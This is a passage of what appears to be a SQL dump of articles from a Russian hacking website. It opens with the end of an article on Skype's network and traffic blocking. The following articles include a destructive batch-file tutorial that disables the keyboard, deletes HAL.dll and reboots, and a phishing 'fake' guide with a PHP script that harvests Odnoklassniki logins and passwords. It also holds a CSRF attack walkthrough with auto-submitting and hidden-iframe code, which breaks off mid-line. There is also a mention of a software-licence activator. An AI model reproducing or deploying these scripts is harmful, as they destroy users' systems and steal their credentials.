исправление программы осуществляется непосредственно в оперативной памяти, а после успешного прохождения проверки на наличие SoftICE, совершается откат, чтобы не волновать процедуру проверки целости.<br />Архитектура распределенной сети<br />На атомарном уровне структура Skype-сети состоит из обычных узлов (normal/ordinal node/host/nest), обозначаемых аббревиатурой SC (Skype Client), и super-узлов (super node/host/nest), которым соответствует аббревиатура SN. Любой узел, который имеет публичный IP-адрес (тот, который маршрутизируется в интернет и обладает достаточно широким каналом, автоматически становится super-узлом и гонит через себя трафик обычных узлов, помогая им преодолеть защиты типа брандмауэров или трансляторов сетевых адресов (NAT) и равномерно распределяя нагрузку между хостами. В этом и состоит суть самоорганизующейся распределенной децентрализованной пиринговой сети, единственным централизованным элементом которой является Skype-login сервер, отвечающий за процедуру авторизации Skype-клиентов и гарантирующий уникальность позывных для всей распределенной сети.<br />Важно подчеркнуть, что связь между узлами осуществляется не напрямую, а через цепочку super-узлов. Серверов в общепринятом смысле этого слова (таких, например, как в сети eDonkey) в Skype-сети нет. Любой узел с установленным Skype-клиентом является потенциальным сервером, которым он автоматически становится при наличии достаточных системных ресурсов (объема оперативной памяти, быстродействия процессора и пропускной способности сетевого канала).<br />Каждый узел Skype-сети хранит перечень IP-адресов и портов известных ему super-узлов в динамически обновляемых кэш-таблицах (Host Cache Tables, HC-tables). Начиная с версии Skype 1.0, кэш-таблица представляет собой простой XML-файл, в незашифрованном виде записанный на диске в домашней директории пользователя.<br />Skype-клиенты за отдельную плату могут принимать входящие звонки с обычных телефонов и совершать подобные звонки. Однако в PC2PC-обмене эти серверы никак не участвуют, поэтому мы не будем на них останавливаться.<br />Как Skype обходит брандмауэры<br />Протокол обмена между Skype-клиентами совершенно недокументирован, и поэтому вся информация о нем получена методами реинженеринга: дизассемблирования Skype-клиентов, анализа перехваченного сетевого трафика и т.д. Поскольку существует огромное количество значительно различающихся между собой версий Skype-клиентов, то описание протокола может содержать неточности, во всяком случае, open source клиента еще никто не написал.<br />Сразу же после своего запуска Skype-клиент открывает TCP- и UDP-порты. Их номера случайным образом задаются при инсталляции и могут быть в любой момент изменены через диалог конфигурации, что затрудняет блокирование Skype-трафика на брандмауэре. Помимо этого, Skype открывает порты 80 (HTTP) и 443, однако они не являются жизненно важными, и даже если их заблокировать, Skype ничуть не огорчится.<br />Ситуация осложняется тем, что Skype шифрует трафик, активно используя продвинутые технологии обфускации, препятствующие выделению постоянных сигнатур в полях заголовков. Алгоритмы шифрования меняются от версии к версии, к тому же выпущено множество специальных версий для разных стран мира, чьи законы налагают определенные ограничения на длину ключа или выбранные криптографические алгоритмы. Но в целом механизм шифрования выглядит так, как показано на рисунке.<br />Skype-клиенты крайне деликатно обходятся с брандмауэрами и трансляторами сетевых адресов, просачиваясь сквозь них через хорошо известные протоколы STUN и TURN. Протокол STUN уже вошел в Библию Интернета и подробно описан в RFC-3489 (www.rfc-archive.org/getrfc.php?rfc=3489). Что же касается TURN'а, то он все еще находится в разработке и в настоящее время доступна лишь черновая версия стандарта: [url]http://jdrosen.net/midcom_turn.html]тыК[/url]<br />Так что, с юридической точки зрения, действия Skype законны и не попадают под статью. STUN, расшифровывающийся как Simple Traversal of User Datagram Protocol (UDP) Through Network Address Translators (NATs) (простое проникновение датаграмм протокола UDP через транслятор сетевых адресов (NAT)), представляет собой отличное средство, которое страдает, однако, рядом ограничений и не работает в следующих случаях:<br />если путь во внешнюю сеть прегражден злобным брандмауэром, режущим весь UDP;<br />если на пути во внешнюю сеть стоит симметричный транслятор сетевых адресов.<br />Ну, с брандмауэром все понятно. Если UDP закрыт, то никак его не откроешь. А вот симметричный транслятор сетевых адресов (symmetric NAT) — это что за штука? Не углубляясь в технические детали, скажем, что симметричный NAT представляет собой разновидность обыкновенного транслятора, требующего, чтобы целевой IP-адрес и порт транслируемого пакета совпадали с внешним (external) IP-адресом и портом. Если один и тот же узел посылает пакеты с одинаковыми исходными IP-адресами и портами по разным направлениям, NAT будет вынужден транслировать их на другие порты. Таким образом, чтобы отправить внутреннему узлу UDP-пакет, внешний узел должен первым делом получить запрос от внутреннего узла. Самостоятельно инициировать соединение внешний узел не в состоянии, поскольку NAT просто не знает, на какой внутренний IP и порт следует транслировать неожиданно сваливавшийся UDP-пакет.<br />Эта проблема решается протоколом TURN (Traversal Using Relay NAT), технические подробности работы которого описаны по вышеупомянутому адресу и большинству читателей совершенно неинтересны. Гораздо важнее другое — протокол TURN значительно увеличивает латентность и теряет большое количество UDP-пакетов (packet loss), что далеко не лучшим образом сказывается на качестве и устойчивости связи, но полное отсутствие связи - еще хуже. Так что пользователям Skype стоит радоваться, а не жаловаться!<br />Вот только администраторы этой радости почему-то не разделяют, наглухо закрывая UDP-трафик (тем более что большинству нормальных программ он не нужен). Немного поворчав для приличия (замуровали, демоны!), Skype автоматически переключается на чистый TCP, отрубить который администратору никто не позволит. Правда, поколдовав над брандмауэром, тот может закрыть все неиспользуемые порты, но в том-то и подвох, что неиспользуемых портов в природе не встречается! При соединении с удаленным узлом, операционная система назначает клиенту любой свободный TCP/UDP-порт, на который будут приходить пакеты. То есть если мы подключаемся к web-серверу по 80-му порту, наш локальный порт может оказаться 1369-м, 6927-м или еще каким-нибудь другим. Закрыв все порты, мы лишимся возможности устанавливать TCP/UDP-соединения!<br />Единственный выход — обрубить всем пользователям локальной сети прямой доступ в интернет, заставив их ходить через proxy-сервер. Однако даже такие драконовские меры не решат проблемы, поскольку Skype просто прочитает конфигурацию браузера и воспользуется proxy-сервером как своим родным!<br />Как заблокировать Skype-трафик<br />Разработчики Skype предостерегают администраторов от попыток выявления и блокирования его трафика (типа: «Все равно у вас ничего не получится!»). И действительно, распознать Skype-трафик очень сложно, а заблокировать его можно только по содержимому, которое зашифровано и не содержит никаких предсказуемых последовательностей. К счастью для администраторов, создатели Skype, при всей своей гениальности, допустили ряд оплошностей, оставив часть трафика незашифрованной. UDP-соединение использует открытый протокол для получения публичных IP-адресов super-узлов, что вполне может быть выявлено анализатором трафика. Это раз. TCP-соединение использует один и тот же RC4-поток дважды, что позволяет нам восстановить 10 первых байт ключа, расшифровав часть постоянных полей заголовков Skype-протокола. Это два! Кстати, весьма полезная вещь для шпионажа за чужими разговорами! Однако мне не известен ни один готовый блокиратор Skype-трафика, а писать свой собственный — лениво да и времени нет.<br />Распознать и заблокировать UDP-трафик намного проще. Каждый фрейм начинается с двухбайтового идентификационного номера (ID) и типа пакета (payload). В UDP-пакет вложен 39-байтный NACK-пакет, пропущенный через обфускатор и содержащий следующие данные:<br />идентификатор пакета (непостоянен и варьируется от пакета к пакету);<br />номер функции (func), пропущенный через обфускатор, но func & 8Fh всегда равно 7h;<br />IP отправителя;<br />IP получателя.<br />Таким образом, чтобы заблокировать UDP-трафик, генерируемый Skype, достаточно добавить в брандмауэр следующее правило:<br />[code]iptables -I FORWARD -p udp -m length --length 39 -m u32<br />--u32 '27&0 x8f=7' --u32 '31=0 x527c4833 ' -j DROP [/code]<br />К сожалению, блокировка UDP-трафика ничего не решает, поскольку Skype автоматом переходит на TCP, но тут есть одна небольшая зацепка. Заголовки входящих IP-пакетов, относящиеся к протоколу обмена SSL-ключами (SSL key-exchange packets), содержат нехарактерный для «нормальных» приложений идентификатор 170301h, возвращаемый в ответ на запрос с идентификатором 160301h (стандартный SSL версии 3.1). Таким образом, блокирование всех входящих пакетов, содержащих в заголовке 170301h, серьезно озадачит Skype, и текущие версии потеряют работоспособность. Вот только надолго ли…<br />Для детектирования и блокирования Skype-трафика можно использовать и другие программно-аппаратные средства, например PRX от Ipoque или Cisco Network-Based Application Recognition (NBAR). Однако все они недостаточно эффективны, так как разработчики Skype не сидят сложа руки, и если кому-то удается найти надежный способ блокировки его поганого трафика, в следующих версиях поганец появляется вновь.<br />Армии дронов, или как зомбировать Skype<br />Дешевизна голосовых разговоров вызвала бурный рост популярности Skype, сеть которого на 27 апреля 2006 года, по официальным данным, составила свыше 100 миллионов зарегистрированных пользователей. А сегодня совершают, по меньшей мере, один Skype-звонок в день свыше 700 тысяч человек! Несложно спрогнозировать, что в скором времени в Skype войдет львиная доля узлов интернета, что имеет как положительную, так и отрицательную сторону.<br />Хакеры уже давно догадались использовать Skype для распространения вирусов и организации распределенных атак, которым очень сложно воспрепятствовать - Skype-трафик надежно зашифрован и не может быть проанализирован антивирусами, заблокирован брандмауэрами или распознан системами обнаружения вторжения.<br />Естественно, чтобы захватить Skype-узел, хакер должен найти способ передать на него зловредный код, что при соблюдении всех мер безопасности он ни за что не сможет сделать. Но, как и всякое другое программное обеспечение, Skype подвержен ошибкам, в том числе и ошибкам переполнения, одна из которых была обнаружена 25 сентября 2005 года. Сейчас она уже давно исправлена и представляет лишь исторический интерес, но с ней все-таки стоит познакомиться поближе (а сделать это можно на skype.com/security/skype-sb-2005-03.html или на seclists.org/fulldisclosure/2005/Oct/0533.html).<br />Возможность передачи управления на shell-код позволяла атакующему овладевать любым Skype-узлом, а также всеми известными ему super-узлами и т.д. Над распределенной сетью нависла глобальная угроза, и просто чудо, что она не закончилась катастрофой. Однако, как показывает практика, там, где есть одна ошибка, рано или поздно появляются и другие. Закрытость исходных текстов и множество антиотладочных приемов (затрудняющих тестирование программы) этому только способствуют!<br />Другая опасная «вкусность» Skype заключается в открытости его API. Пойдя навстречу сторонним разработчикам, создатели Skype предусмотрели возможность интеграции любой прикладной программы со Skype-клиентом. Правда, при этом на экран выводится грозное предупреждение, что такая-то программа хочет пользоваться Skype API: разрешить или послать ее на фиг? Естественно, большинство пользователей на подобные вопросы отвечают утвердительно. Уже привыкшие к надоедливым предупреждениям, они инстинктивно давят «Yes» и только потом начинают думать, а что же они, собственно, разрешили?<br />Понятное дело, что, чтобы использовать Skype API, зловредную программу нужно как-то доставить на компьютер. Раньше для этого применялась электронная почта, успешно фильтруемая антивирусами, но количество пользователей, запустивших исполняемый файл, все равно исчислялось миллионами. Теперь же для рассылки вирусов можно использовать сам Skype. Локальный антивирус — единственное средство обороны, потенциально способное отразить атаку. Но, если он и установлен, распознать неизвестный науке вирус он не в состоянии даже при наличии антивирусных баз первой свежести (эвристика пока все-таки работает больше на рекламу, чем на конечный результат).<br />Важно, что протокол Skype уже частично расшифрован и созданы хакерские инструменты, позволяющие взаимодействовать со Skype-узлами в обход стандартных Skype-клиентов, и даже без сервера регистрации! И хотя в настоящее время дело ограничивается простым сбором адресов super-узлов, существует принципиальная возможность создания своих собственных сетей на базе распределенной Skype-сети, главная ошибка разработчиков которой заключается в том, что Skype-узлы безоговорочно доверяют друг другу и вся «безопасность» зиждется лишь на закрытости протокола.<br />Заключение<br />Заканчивая статью, я хотел бы спросить: что же все-таки скрывают создатели Skype в недрах своего кода? Почему, распространяя программу бесплатно, они зажимают исходные тексты и используют закрытый протокол, вызывая тем самым недоверие специалистов по безопасности? Для чего бесплатной программе столь навороченная защита, снижающая производительность и потребляющая большое количество памяти, ведь ломать ее никто не собирается? Почему вообще Skype-клиент реализован как черный ящик?<br />Вопросы риторические. Но чует мой хвост, не спроста все это!","как Крис надругался над skype","journal_images/img_576392.png","1378234557","3");
INSERT INTO gazeta_article VALUES("164","18","всем привет )) будем писать с вами batnik для тех кто не знает что это - выходим на главную )) ну ладно начали ))) <br /> дял начала запрет выходить окошку cmd <br />командой <br />[code]@echo off [/code]<br /> дальше напишем к примеру какую нибудь команду ( для тестирования) <br /> к примеру команда:<br />start explorer(откроет проводник) <br /> и вот окошко cmd не вылезло - значит все нормас ) <br /> теперь напишем какую нибудь серьезную хреновину )) :D <br /> к примеру вот такую команду <br /><br />[code]@echo off<br />rundll32 keyboard,disable[/code]<br /> в этом случае у нашего "врага " отключится клавиатура )) <br /> ну да ладно не остановимся на этом ) <br /> копируемся в системную папку вот такой командой: <br />[code]copy %0 %windir%/system <br />label hackbit[/code]<br /> удачно ! <br /> дальше не много пошутим(совсем не много) <br /> вводим такую команду <br /> [code]label hackbit[/code] <br /> и жесткий диск переименуется в "hackbit"<br /> дальше если вы хотите очень напакостить то вводим такую команду:<br />[code]del %systemroot%\system32\HAL.dll[/code]<br /> советую быть с ней очень осторожной, т.к снос винды обеспечен , <br /> и так дальше чтобы наш "недруг" почувствовал всю силу батника допишем команду перезагрузки компа: <br />[code]@echo off <br />shutdown -r -t 1 -c "lol" >nul[/code]<br /> обьясняю зачем она : как только комп перезагрузится появится черное окошко(снос винды) и все , комп не включится , дальше чтоб нам особо не палится надо из bat сделать exe , вы спросите как же это сделать ?) отвеечаю ! есть одна замечательная программа , bat converter(в зц ) думаю с ней даже новичок справится )) сделали , но перед этим советую подумать головой )) ведь отвечаете только Вы )) <br /> ну думаю обьяснил максимально подробно , всем спасибо за внимание !","Bantnik","journal_images/img_151769.png","1378312874","3");
INSERT INTO gazeta_article VALUES("166","23","Всем привет!!! <br />И так приступим,сечас я буду учить вас делать фейк с помощю мобильного телефона!<br />Для начало нам нужен телефон с доступом в интернет,опера мини и какой нибуть текстовый редактор(я пользуюсь встроенним в мини коммандер)!<br />ШАГ 1! Приготовливаем оперу мини,так как не во всех операх есть копипаст(копировать/вставить текст),мы воспользуемся яваскриптом и предварительно занисем две закладки в память оперы,а именно: <br />[code]javascript:document.write(document.all.tags('html')[0].outerHTML.replace(/</gim,'&lt;').replace(/>/gim,'&gt;').replace(/\n/gim,'<br/>')); [/code]<br />этот код покажет нам исходный код страницы на которой мы находимся(sеrvеr:sоurсе мы пользоваться не будем,т.к. эта команда покажет нам исх.код в виде веб,а нам будет удобней вап),и следующую закладку: <br />[code]javascript:document.writeln('<textarea%20rows="40">'+document.body.outerHTML.replace(/\n/gim,'').replace(/<br([^>]+)>/gim,'\n').replace(/<br>/gim,'\n').replace(/<([^>]+)>/gim,'')+'</textarea>');[/code]<br />этот код занисет нашу страницу в текстреа(не забиваем,что этот код надо уводить(переходить на закладку),только после того,как перешли на первую,чтобы в текстреа был занесен именно исх.код страницы,а не её текст!(ЭТОТ КОД НЕ НУЖЕН ЕСЛИ В ОПЕРЕ ЕСТЬ КОПИПАСТ,НАЧИНАЯ С 6 ВЕТКИ ОПЕРЫ,ИЛИ МОД.ОПЕРЫ)!<br />ШАГ 2! Переходим на страницу с которой будем делать фейк,дальше переходим на первую закладку,а потом на вторую,дальше заходим в поле текстреа и копируем содержымое в буфер обмена!<br />ШАГ 3! Создаем индексионный файл(indех.рhр/indех.html),и вставляем наш код(с буфера)!<br />И в этом же коде ищем строку отвечаючей за форму ввода(например <fоrm асtiоn="***"... ,где *** - ссылка куда отправляються даные с формы!(сдесь пишем например: lоgin.рhр).<br />ШАГ 4! Создаем тот самый файл "lоgin.рhр",который будет обрабативать даные получены с формы ввода!Туда мы пишем следующее: <br />[code]<br /><br />$BASE="bduser.php";<br />$IS_EMAIL=false;<br />$LOCATION="http://m.odnoklassniki.ru/";<br /><br />$p0=$_REQUEST["fr_login"];<br />$p1=$_REQUEST["fr_password"];<br />$headers = "";<br />$info="$p0:$p1:\n";<br /><br />if ($IS_EMAIL){<br />mail($BASE, "Login Pass Fake", $headers.$info);<br />} else {<br />$fd=fopen($BASE,"a+");<br />fwrite($fd,$info);<br />fclose($fd);<br />}<br /><br />header("Location:$LOCATION");<br /><br />[/code]<br />ШАГ 5! Нам надо создать базу куда будут писаться даные получены с формы! Создаем файл: "bdusеr.рhр",так как мы указали именно это название в "lоgin.рhр",в нем мы пишем следующее: <br />[code]<br />exit;<br />[/code] !<br />Вот и все,у нас должно быть три файла!Как реализовать фейк,это уже ваше личное дело!Статья написана в ознакомительных целях!До новых встреч,в новых увлекательных статьях! :D<br /><br /><br />P.S. Статья написана специально для сайта hackbit.net > > > не сайт , не автор не несет отвественности за ваши действия : <br />т.е если вы что то взломали , то МЫ тут вообще не причем(грубо говоря)!!!<br />Автор:Mhack<br />","фэйк","journal_images/img_140251.png","1378493670","3");
INSERT INTO gazeta_article VALUES("167","22","Всем привет....<br />Да, красивым сайтом сегодня уже мало кого можно удивить, однако проявить каплю творчества в этом плане никому бы не помешало :) . Цены на уникальное оформление достигают космических масштабов, шаблоны в сети уже успели всем надоесть, но как говорится нет безвыходных ситуаций!<br /><br />Я предлагаю простой способ немного улучшить детали своего сайта. Смысл прост:<br /><br />Просите у [u]Гугла Поисковича[/u] показать [b]красивые сайты, блоги…[/b]<br />Погуляв по этим красивым сайтам, выделите для себя те элементы, которые Вам понравились на этом сайте. Это может быть все, что угодно: элементы шапки, форма подписки, логотип, какие-то кнопки, формы, текстовые поля, фоновые картинки, общая цветовая гамма, разные флеш и ява примочки.<br />Устанавливаем в свой браузер плагин – инспектор элементов. Для FireFox это FireBug, вообще во всех новых браузерах есть функция проинспектировать элемент. Немного этой темы я касался в статье: Как изменить оформление шаблона. В этой статье Вы найдете инфу как найти функцию “проинспектировать элемент” в любом браузере.<br />50% дела уже сделано! Теперь осталось щелкнуть правой кнопкой мыши по нужному элементу сайта и нажать:Просмотр кода элемента\Проинспектировать элемент\Средства разработчика. Фраза может быть иной в зависимости от Браузера.<br />Далее: [b]копируем[/b] CSS и html код НА СВОЙ САЙТ и дело В ШЛЯПЕ!","[u]Слив дизайна[/u]","journal_images/img_693935.png","1381088049","3");
INSERT INTO gazeta_article VALUES("168","21","Защита нашего компьютера<br /><br /><br /> Всем известно, что интернет давно стал главным разносчиком всяческой компьютерной заразы. Как правило, ничем хорошим "приобретение" вируса (а так же трояна или червя... о различиях между ними чуть позже) не заканчивается. А подхватить такую гадость можно очень просто, скачав любую заражённую программу. Так же всем (очень на это надеюсь) известно о необходимости использования антивирусных программ, дабы предотвратить заражение своего ПК вредоносным ПО (вредоносным программным обеспечением, так же имtнуемым как malware). Хорошие антивирусы обычно бесплатными не бывают и требуют установки так называемого ключа, без которого наотрез отказываются работать или обновлять свои базы. <br />Позвольте пару слов об этих самых базах. Называются они сигнатурами и служат для того, чтобы антивирусная программа могла находить и обезвреживать всю новую заразу. Конечно, malware написать проще, чем антивирус, поэтому новые вирусы и трояны появляются почти каждый день, отсюда и необходимость ежедневно обновлять сигнатуры угроз любого антивируса. <br />Принцип работы любой антивирусной программы заключается в том, что она сверяет код проверяемого файла со своими сигнатурами и по ним определяет тип и название вредоносной программы. Делаем вывод, что если код вируса изменить особым образом (закриптовать), то он перестанет совпадать с сигнатурами, и антивирус может его пропустить. То есть, даже если у вас установлен самый современный антивирус с только что обновлёнными базами, это не гарантирует полной безопасности. Профессионально закриптованный вирус всё равно проберётся к вам на диск. Именно для таких случаев во многих современных антивирусах и во всех фаерволах (firewall) есть возможность контроля активности приложений (так называемая проактивная защита). Она не сверяет и не анализирует код программы, а вместо этого контролирует действия приложения и не позволяет ему своевольничать и выполнять опасные действия (изменение защищённых ключей реестра, системных файлов и т.п.). Как уже было сказано выше, не все антивирусные программы обладают таким "талантом", зато для этого есть... <br />Фаерволлы. Именно связка антивирус+фаерволл+грамотный пользователь обеспечивает наибольшую безопасность! Помимо контроля активности приложений, фаерволл производит контроль сетевых подключений и призван предотвращать несанкционированные подключения к вашему компьютеру из сети (как локальной, так и глобальной [интернет]) и сетевые атаки (о них узнаете позже). Без установленного фаерволла ваш компьютер может быть уязвим к любым dos-атакам и даже может невольно стать участником ботнета. Вобщем, удовольствие ниже среднего. А теперь давайте подумаем, каков же... <br />Шанс заразиться в интернете. Скажите, вы всегда пользуетесь лицензионными программами и играми из магазина? Нет? Тогда где вы берёте бесплатное (и неважно что нелицензионное) ПО? Конечно, скачиваете из тырнета (ну а как ещё это назвать, если вы буквально тырите оттуда нелегальный софт? smile )! В большинстве случаев вы можете полагаться на свой антивирус, хотя об одном исключении (когда вирус новый и хорошо закриптован) я уже говорил, сейчас назову ещё одно. Очень многие краки (они же no-dvd, craks или кейгены) для игр и программы из категории хак-тулзов (от англ. hack-tool - инструмент взлома) распознаются антивирусами как вредноносное ПО и беспощадно удаляются просто для того, чтобы ими пользовалось как можно меньше народу. Что делаем в таких случаях? Конечно, отключаем антивирус, добавляем приложение в доверенную группу в фаерволле и... остаёмся совершенно беззащитны! А вдруг программа заражена каким-нибудь гадким троянчиком? Ведь тогда вы даже не будете подозревать о его вторжении! Даже в таких, казалось бы, безвыходных ситуациях (когда для нормальной работы нужно отключить всю защиту), есть выход! <br />Виртуальная машина. Это программа, позволяющая прямо во время работы вашего компьютера с уже запущенной операционкой запустить под ней ещё одну операционную систему на виртуальном компьютере. Так как ОС и компьютер виртуальные, на них можно без страха запускать для проверки всё что угодно, хоть вирусы тестировать! wink Так что привыкайте все новые приложения из не особо доверенных источников (к коим относятся все источники, кроме официального сайта производителя и магазина лицензионного софта) сначала проверять на виртуалке. <br /><br /><br />Где всё это взять и как выбрать<br /><br /> Выбрать хорошие программы для защиты ПК непросто. Очень уж широк выбор и слишком спорно и незаметно преимущество одной популярной программой над другой. Лично я выбрал для себя Kaspersky Internet Security лишь по одной простой причине - это комплекс защитных средств, в который входит антивирус, фаерволл, анти-спам и анти-баннер. Очень удобно когда всё это собрано в одной программе. Так же неплохой бесплатной альтернативой является Comodo Internet Security. Если предпочитаете что-то другое - гугл вам в помощь! Кстати, чуть не забыл! Касперским можно пользоваться и без всяких ключей! Качаем активатор. <br />Что касается виртуальной машины, то её можно скачать отсюда и установить на неё любую операционку по вашему вкусу, как на обычный компьютер. Ну вот и всё о чём я хотел рассказать в этом уроке. Надеюсь, информация была полезна, а привычка запускать подозрительные приложения на виртуалке не раз убережёт вас от переустановки вашей ОС. biggrin Чтож, до скорого! wink<br />","Защита ОС","journal_images/img_784387.png","1390707271","1");
INSERT INTO gazeta_article VALUES("169","21","XSRF или CSRF<br /><br />XSRF - Cross Site Request Forgery (X и C взаимозаменяются по аналогии с xss, но можно встретить и название CSRF), а по-русски - межсайтовая подстановка запроса. <br />Уязвимость возникает вследствие отсутствия проверки источника данных, передаваемых скриптам сервера. Позволяет передать заранее сформированные данные форм ввода (напр. отправка сообщений, смена подписи\аватара) с другого узла скриптам атакуемого ресурса. При этом передаются те же данные, которые мог бы ввести сам пользователь. Но никогда не стал бы wink <br /> Может не очень правильно объяснил, ибо своими словами smile Короче, теперь поясню суть доступнее. Есть на форуме возможность отправки сообщений. Можно сформировать такой html-код, что при его открытии в браузере, пользователь, запустивший код (и при этом авторизованный на том самом форуме), сам того не зная, отправляет админу матерные сообщения... biggrin ну это только например, всё зависит от нашей фантазии wink <br /><br /><br />Поиск уязвимости<br /><br /> Ищется империческим путём, в народе так же именуемым методом тыка. xD <br />Так же многие сканеры уязвимостей веб-интерфейсов (напр. w3af, jsky и т.п.) умеют анализировать возможность проведения xsrf-атаки. <br />Получается, что проверять, есть уязвимость или нет, мы будем в процессе её эксплуатирования. Сначала заготовим (сформируем) запрос, а потом проверим, сработает или нет. loony <br /><br /><br />Проводим XSRF-атаку<br /><br /> Суть формировки запроса к атакуемому ресурсу заключается в сохранении кода формы отправки запроса (1), подстановки в неё наших значений (2) и создания кода автоисполнения запроса (3). Далее разберём каждый пункт подробно. В качестве жертвы выберем сами себя, можете проверять на любом форуме, где вы зарегестрированы. Что будете с собой делать - решать вам) Можно отправить самому себе сообщение для начала, а можно и подпись поменять на "я идиот" biggrin (но это уже для врагов, а не для себя xD). <br />Я буду разбирать всё на примере отправки сообщения самому себе на форуме под булкой (VBulletin). Первый попавшийся лично мне под руку был HPC rolleyes <br />1) Сохраняем нужный код. Если решили отправлять сообщения, зайдём на страницу отправки (мой кабинет -> новое сообщение) и откроем исходный код. Отсюда нам понадобится не всё, а только форма отправки сообщения (заключена в теги ). Ищем в исходном коде слова, находящиеся в форме отправки где-нибудь в начале. Я буду искать текст "Список получателей". Тут же рядом находится открывающий тег <="" form="">и копируем в текстовик всё, что между ними. У меня получилось вот такое безобразие. <br />2) Подставляем значения (формируем запрос). Надеюсь, все читающие знают или хотя бы понимают html, поэтому без проблем вкурят, по какому принципу будут выполнять подстановку в будущем самостоятельно (вне этого римера). Итак, обратимся к странице отправки сообщения: <br /><br /><br /><br />Как видим, нам нужно заполнить 3 поля: получатель (1), тема сообщения (2) и сам текст (3). Давайте найдём их в сохранённом коде wacko Есть тут такая фишка: можно ввести в поля, например, слово "упячка", нажать "Предварительный просмотр сообщения" и моментально найти по этому слову в коде, куда нужно подставлять свои значения. Ткая вот военная хитрость! wink <br />Вот получатели (строка 43): <br /><br /><br />Code<br /><br /><br /> <div>Список получателей</div> <br /> <div id="pmrecips"><textarea id="pmrecips_txt" name="recipients" rows="1" cols="50" tabindex="1">M@ZAX@KEP</textarea></div> <br /><br /><br />Обратите внимание, что кроме textarea так же распространены простые формы ввода (input type="text"), где значение (содержимое формы) вписывается в параметр value, как в случае с заголовком сообщения (строка 104): <br /><br /><br />Code<br /><br /><td class="smallfont" colspan="3">Заголовок:</td> <br /> </tr> <br /> <tr> <br /> <td><input type="text" class="bginput" name="title" value="ZADROT_POWER FOREVER!" size="50" maxlength="85" tabindex="1" /></td><br /><br />А вот и само сообщение (строка 333): <br /><br /><br />Code<br /><br /><br /> <textarea name="message" id="vB_Editor_001_textarea" rows="10" cols="60" style="display:block; width:380px; height:250px" tabindex="1" dir="ltr">Здесь текст сообщения. Какой хотите))</textarea><br /><br />2) Делаем автовыполнение запроса. <br />Для этого в конец нашего кода нужно дописать такую строку: <br /><br /><br /><br />Code<br /><br /></body></html><br /><br />Чтобы закрыть все теги, а в самое начало добавим строку <br /><br /><br />Code<br /><br /><html><body onload="document.forms['NAME'].submit();"><br /><br /> , где NAME нужно заменить на имя вашей формы. <br />Пример: если тег формы в начале был такой: <br /><br /><br />Code<br /><br /><br /> <form action="private.php?do=insertpm&pmid=0" method="post" name="vbform" onsubmit="return vB_Editor['vB_Editor_001'].prepare_submit(this.title.value, 0)"><br />, то имя формы здесь vbform (name="vbform"), то есть NAME заменяем на vbform. <br />Этот код будет выполнять действие submit сразу после загрузки формы. <br />Чуть не забыл самую важную вещь! Для того, чтобы форма находила скрипт-обработчик, куда нужно отправлять все данные формы, нужно в теге формы атрибуту action прописать полный путь до скрипта. То есть сейчас мы имеем относительный путь: <br /><br /><br />Quote<br /><br /><br />action="private.php?do=insertpm&pmid=0" method="post" name="vbform" onsubmit="return vB_Editor['vB_Editor_001'].prepare_submit(this.title.value, 0)"><br />, а нужен нам полный: <br /><br /><br />Quote<br /><br />action="https://hacker-pro.net/private.php?do=insertpm&pmid=0" method="post" name="vbform" onsubmit="return vB_Editor['vB_Editor_001'].prepare_submit(this.title.value, 0)"><br /><br />Это очень частая ошибка! Сам в этом только что убедился, потому что наступил на эти грабли biggrin <br /> Думаю, в этом не было абсолютно ничего сложного. Сохраняем наш код в файлс расширением .html и будем проверять, сработает ли атака smile <br /><br /><br />Тестирование<br /><br /> Удостоверьтесь, что вы авторизованы на форуме и просто откройте в браузере только что сохранённый файл. Ждём пару секунд до полной загрузки и... после отправки сообщения нас перекидывает обратно в личный кабинет (нет, это не мы сделали, так форум устроен xD) и тут же результат: входящее сообщение от самого себя. xD Как видим, всё прекрасно работает! smile <br /><br /><br /><br /><br /><br /><br />Практическое применение<br /><br /> Итак, у нас всё заработало и сами себе мы сообщение отправить можем. Это конечно хорошо, но "Как это можно использовать?" - спросите вы. Да элементарно, Ватсон! xD Заливаем нашу страничку на любой хостинг и каждый, кто пройдёт по ссылке на нашу страницу, будет выполнять этот код (при услови, что он авторизован на сайте, чтобы выполнить запрос) и отправлять нам это сообщение. Нетрудно догадаться, что, модифицировав код под наши конкретные нужды, можно в принципе заставить пользователя совершить почти любое действие. Всё зависит от атакуемого ресурса, ваших целей и фантазии! =) Суть уловили? Врубайте фантазию и смекалку! biggrin<br /><br />//Update (от 04.03.2011) <br />{ <br />Обрадовались? Рано. =) Залейте ту же страницу на локалхост или любой хостинг и зайдите на неё. Работает? Хрен. Анализируем наши ошибки. Внимательно посмотрите, какие данные передаются "атакуемому" серверу из формы отправки сообщения. Особенно нас будет интересовать то, чего не видно простым смертным. Скрытые поля: <br /><br /><br />Code<br /><br /><br /> <input type="hidden" name="do" value="process" /> <br /> <input type="hidden" name="quicksearch" value="1" /> <br /> <input type="hidden" name="childforums" value="1" /> <br /> <input type="hidden" name="exactname" value="1" /> <br /> <input type="hidden" name="s" value="" /> <br /> <input type="hidden" name="securitytoken" value="1299250106-6d087ee2302078af38a29dcec38647831288b404" /> <br /><br /><br />Здесь name="securitytoken" как бы намекает (; Включив соображалку, можно догадаться, что значение поля генерируется при запросе формы отправки сообщения и сверяется каждый раз при передачи данных формы серверу. Ясен пень, значение рандомное и уникальное для каждого юзера. Посему, наш скрипт с XSRF здесь отработает только 1 раз... и только под нашим же аккаунтом. <br />Сделали важный вывод - перед тем, как хакать интернеты (lol), проверяем форму на налчие подобных скрытых полей. Ну и не забывваем реализовывать подобный механизм идентификации пользователя при написании собственных веб-приложений. Самым очевидным решением является использование в качестве контрольного значения идентификатора сессии. Жаль только, что печеньку можно запросто отсниффать, так что для искушённых есть более надёжные методы. <br /><br />Однако это не значит, что всё вышенаписанное - бесполезный бред. При нормальных условиях (атм. давление 101 кПа и t=273 Кельвина ;D), отсутствии механизма проверки пользователя, данная атака будет осуществима. <br />}<br /><br />Теперь пару слов о том, как сделать код менее палевным, чтобы его не было видно жертве. <br />Создайте файл .html с таким содержимым: <br /><br /><br />Code<br /><br /><html> <br /> <title> <br />Заголовок страницы <br /></title> <br /> <bоdу background="http://адрес к картинке/"> <br /> <ifrаmе src="1.html" width="1" height="1"></ifrаmе> <br /> </bоdу></html><br /><br />1.html замените на имя вашего файла с XSRF-кодом и залейте оба файла в одну папку на хостинге. Теперь, дав ссылку жертве на последний файл, она будет смотреть картинку, а действие уже выполнится. Суть заключена в теге ifrаmе. По сути вы можете вставить этот код в любой html-файл (и даже при помощи xss-уязвимости можно провести xsrf-атаку wink ) для незаметного выполнения атаки: <br /><br /><br />Code<br /><br /><ifrаmе src="http://yourhost.ru/xsrf.html" width="1" 